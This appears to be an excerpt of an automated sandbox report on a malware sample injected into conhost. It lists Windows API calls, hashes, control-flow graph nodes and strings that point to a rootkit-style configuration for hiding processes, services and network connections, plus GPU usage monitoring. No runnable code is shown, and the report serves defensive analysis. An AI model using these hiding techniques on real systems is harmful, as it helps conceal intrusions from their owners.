                                  • Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                  • Instruction ID: 77bacc30024897c50d2f6b4033f6c4c67139cf40be5e418a9d2f65a8796da475
                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                  • Instruction Fuzzy Hash: B391237AB0165087EF648F25D404BADB391FF54B98F54C125AE4927BCADF78E862C700

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 000001B444901724: GetProcessHeap.KERNEL32 ref: 000001B44490172F
                                    • Part of subcall function 000001B444901724: HeapAlloc.KERNEL32 ref: 000001B44490173E
                                    • Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B4449017AE
                                    • Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B4449017DB
                                    • Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B4449017F5
                                    • Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B444901815
                                    • Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B444901830
                                    • Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B444901850
                                    • Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B44490186B
                                    • Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B44490188B
                                    • Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B4449018A6
                                    • Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B4449018C6
                                  • SleepEx.KERNELBASE ref: 000001B444901BDF
                                    • Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B4449018E1
                                    • Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B444901901
                                    • Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B44490191C
                                    • Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B44490193C
                                    • Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B444901957
                                    • Part of subcall function 000001B444901724: RegOpenKeyExW.ADVAPI32 ref: 000001B444901977
                                    • Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B444901992
                                    • Part of subcall function 000001B444901724: RegCloseKey.ADVAPI32 ref: 000001B44490199C
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                  • String ID:
                                  • API String ID: 948135145-0
                                  • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                  • Instruction ID: 6e1254c9787817054b27d65b23253e437fec1e13415517c8455c0dc35860bb55
                                  • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                  • Instruction Fuzzy Hash: 9131EC7920065193FB509F36D9C33E973F5AB84BD6F04D4219E0A87797DF26C8B0A214

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 197 1b444902ff0-1b444903069 199 1b444903384-1b4449033a7 197->199 200 1b44490306f-1b444903075 197->200 200->199 201 1b44490307b-1b44490307e 200->201 201->199 202 1b444903084-1b444903087 201->202 202->199 203 1b44490308d-1b44490309d GetModuleHandleA 202->203 204 1b44490309f-1b4449030af GetProcAddress 203->204 205 1b4449030b1 203->205 206 1b4449030b4-1b4449030d2 204->206 205->206 206->199 208 1b4449030d8-1b4449030f7 StrCmpNIW 206->208 208->199 209 1b4449030fd-1b444903101 208->209 209->199 210 1b444903107-1b444903111 209->210 210->199 211 1b444903117-1b44490311e 210->211 211->199 212 1b444903124-1b444903137 211->212 213 1b444903147 212->213 214 1b444903139-1b444903145 212->214 215 1b44490314a-1b44490314e 213->215 214->215 216 1b44490315e 215->216 217 1b444903150-1b44490315c 215->217 218 1b444903161-1b44490316b 216->218 217->218 219 1b444903251-1b444903255 218->219 220 1b444903171-1b444903174 218->220 221 1b444903376-1b44490337e 219->221 222 1b44490325b-1b44490325e 219->222 223 1b444903186-1b444903190 220->223 224 1b444903176-1b444903183 call 1b444901a30 220->224 221->199 221->212 227 1b44490326f-1b444903279 222->227 228 1b444903260-1b44490326c call 1b444901a30 222->228 225 1b4449031c4-1b4449031ce 223->225 226 1b444903192-1b44490319f 223->226 224->223 231 1b4449031fe-1b444903201 225->231 232 1b4449031d0-1b4449031dd 225->232 226->225 230 1b4449031a1-1b4449031ae 226->230 234 1b4449032a9-1b4449032ac 227->234 235 1b44490327b-1b444903288 227->235 228->227 239 1b4449031b1-1b4449031b7 230->239 242 1b44490320f-1b44490321c lstrlenW 231->242 243 1b444903203-1b44490320d call 1b444901cc4 231->243 232->231 240 1b4449031df-1b4449031ec 232->240 237 1b4449032b9-1b4449032c6 lstrlenW 234->237 238 1b4449032ae-1b4449032b7 call 1b444901cc4 234->238 235->234 244 1b44490328a-1b444903297 235->244 248 1b4449032c8-1b4449032d7 call 1b444901cfc 237->248 249 1b4449032d9-1b4449032e3 call 1b444903f88 237->249 238->237 262 1b4449032ee-1b4449032f9 238->262 246 1b444903247-1b44490324c 239->246 247 1b4449031bd-1b4449031c2 239->247 250 1b4449031ef-1b4449031f5 240->250 253 1b44490321e-1b44490322d call 1b444901cfc 242->253 254 1b44490322f-1b444903241 call 1b444903f88 242->254 243->242 243->246 252 1b44490329a-1b4449032a0 244->252 257 1b4449032e6-1b4449032e8 246->257 247->225 247->239 248->249 248->262 249->257 250->246 260 1b4449031f7-1b4449031fc 250->260 252->262 263 1b4449032a2-1b4449032a7 252->263 253->246 253->254 254->246 254->257 257->221 257->262 260->231 260->250 269 1b4449032fb-1b4449032ff 262->269 270 1b444903370-1b444903374 262->270 263->234 263->252 271 1b444903307-1b444903321 call 1b444913a40 269->271 272 1b444903301-1b444903305 269->272 270->221 273 1b444903324-1b444903327 271->273 272->271 272->273 276 1b444903329-1b444903347 call 1b444913a40 273->276 277 1b44490334a-1b44490334d 273->277 276->277 277->270 279 1b44490334f-1b44490336d call 1b444913a40 277->279 279->270
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                  • API String ID: 2119608203-3850299575
                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                  • Instruction ID: f19e88b38da2e868398529867b38f79ee213d6d69e11121c6d470f46b12ee64b
                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                  • Instruction Fuzzy Hash: 3BB16A32210A9087EBB98F3AD5807E9B3B5FB44B95F449016EE0953B96DF35CDA0E340
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                  • String ID:
                                  • API String ID: 3140674995-0
                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                  • Instruction ID: e3595aa80cb7f297cfd4bdfd6c1cde47688bffe1b9601e4010324c5f3db2d6d5
                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                  • Instruction Fuzzy Hash: B0312A72305B8086EB64CF60E8903EE7374F788755F44842ADA4E47B9ADF78C658D710
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                  • String ID:
                                  • API String ID: 1239891234-0
                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                  • Instruction ID: f52a36cc636f09f8b5e552652fc3d8b665fe62fa1539667c9fba548d34cf0822
                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                  • Instruction Fuzzy Hash: CA414A36214B8086EB60CF35E8843DE73B4F788765F504125EA8D47B9ADF38C565CB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Find$CloseFile$FirstNext
                                  • String ID:
                                  • API String ID: 1164774033-0
                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                  • Instruction ID: ef23d8bfd7e90e7819dfaab127171bb9860a9eb09a815f2fa837f70c63e50882
                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                  • Instruction Fuzzy Hash: 79A1C4327046814BFB609B75A8C43ED7BB1E781B94F18C215DE9927A9BDF78C462E700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                  • String ID:
                                  • API String ID: 2933794660-0
                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                  • Instruction ID: 0fc1d90d3220575b7f2e7f5799fd329467a67fd21566eb98698ed5738f0ce078
                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                  • Instruction Fuzzy Hash: F9110336711B048AFB40CB70E8953A833B4F719768F440E21EA6D86BA5DF78C1689280
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                  • Instruction ID: 90366e5366d00e0c70a64bece1d34f0fc74d4eef949232695818a863a0960041
                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                  • Instruction Fuzzy Hash: FAE0ED716115049BF7599B62D84479976B1FB88B2AF45C024C90907311EF3884A9A610
                                  APIs
                                    • Part of subcall function 000001B44490D220: HeapAlloc.KERNEL32(?,?,00000000,000001B44490C987), ref: 000001B44490D275
                                    • Part of subcall function 000001B444910EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001B444910EEB
                                  • FindFirstFileExW.KERNEL32 ref: 000001B44490DB99
                                    • Part of subcall function 000001B44490D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001B44490674A), ref: 000001B44490D2B6
                                    • Part of subcall function 000001B44490D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001B44490674A), ref: 000001B44490D2C0
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                  • String ID:
                                  • API String ID: 2436724071-0
                                  • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                  • Instruction ID: 0bc2fadcf614fe65fe53b86c12825d93c8f1f6ddaa189099f2eb586b8829b897
                                  • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                  • Instruction Fuzzy Hash: 3281C73230468087FB60DB36A5813EEB7B1E785B94F58C315AEA957B96DF38C061A700
                                  Memory Dump Source
                                  • Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                  • Instruction ID: ba63ec2b3e3d03f3cae939323a6bb08408eb99612668a7e48b496dd823500e1b
                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                  • Instruction Fuzzy Hash: 60B1693A311AA087EFA89F25D5507E9B3A4FB44B84F049016EE09637D6EFB5CDA0C740
                                  Memory Dump Source
                                  • Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
                                  • Instruction ID: 2e2e519d21db3ab41236182649ae8370bdd20ef6a60f49d84cc5fe600eb5c2ed
                                  • Opcode Fuzzy Hash: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
                                  • Instruction Fuzzy Hash: 24A1E43A7046808AFF20DB75E8443EE7BA1AB91B94F14C115DE9977AD6DFB8C462C700
                                  Memory Dump Source
                                  • Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo
                                  • String ID:
                                  • API String ID: 3215553584-0
                                  • Opcode ID: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
                                  • Instruction ID: be96b842b30987697152417e238cb313adde61b72f03c7a98da1dc76df884039
                                  • Opcode Fuzzy Hash: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
                                  • Instruction Fuzzy Hash: 1381B53A70468087EF20DF26E4403EABB91EBD5B94F54C515AE99677D6DFB8C0618700
                                  Memory Dump Source
                                  • Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                  • Instruction ID: f912ba5854758a203d3ba1b75dcf7830b72495d304e79a336de37b054240e103
                                  • Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                  • Instruction Fuzzy Hash: DB1188B56245D0CBFFA99F2994953997790F3083C5F40C42DE54986A96CF3DC4B08F04

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                  • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                  • API String ID: 2135414181-3414887735
                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                  • Instruction ID: 9bc4a22ea6ab8788bf6f3bd34cfdb0c10a1eb64e2c9d052235ec0966a5482177
                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                  • Instruction Fuzzy Hash: 5A711436210A5087EB609F76E8D17D833B4FB88B9AF419121DE4D83B6ADF39C564E340

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                  • String ID: d
                                  • API String ID: 2005889112-2564639436
                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                  • Instruction ID: 29ce64bbed44bf87718749bd442be98e20a454b8ddc58ef00a57f35e6f7e2bfd
                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                  • Instruction Fuzzy Hash: BF515A32200B849BE765CF72E48879A77B1F788F9AF458124DE4A47729DF3CC0699700

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                  • API String ID: 740688525-1880043860
                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                  • Instruction ID: 7894e31d9bf7f1e1d8f0daf2918ae5a7139f82b40a6c85b9485f4f9eaf871bf0
                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                  • Instruction Fuzzy Hash: 0051AC32701B0493FA659F76A8807E932B0BB48BB0F88C7259E3D473D6DF78D565A240

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                  • String ID: \GPU Engine(*)\Running Time
                                  • API String ID: 1943346504-1805530042
                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                  • Instruction ID: 63f3587b54d2b15d1fd7c5ad99d3bcc5b50314de1d7ee5e6b6195a911edfd8a6
                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                  • Instruction Fuzzy Hash: D231A232A00B4097F771DF72A8847D9B3B0F788BD6F858625DE4947A26DF38C4669740

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                  • API String ID: 1943346504-3507739905
                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                  • Instruction ID: 3ae4c25ad16d35e7700d5eaf680f80ff8f1b795346d6e8fd04e9380eb0645f7a
                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                  • Instruction Fuzzy Hash: A2312B32610B458BFB60DF32A8C4B99B3B1B788F95F4581259E4A53766EF38C866D700

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
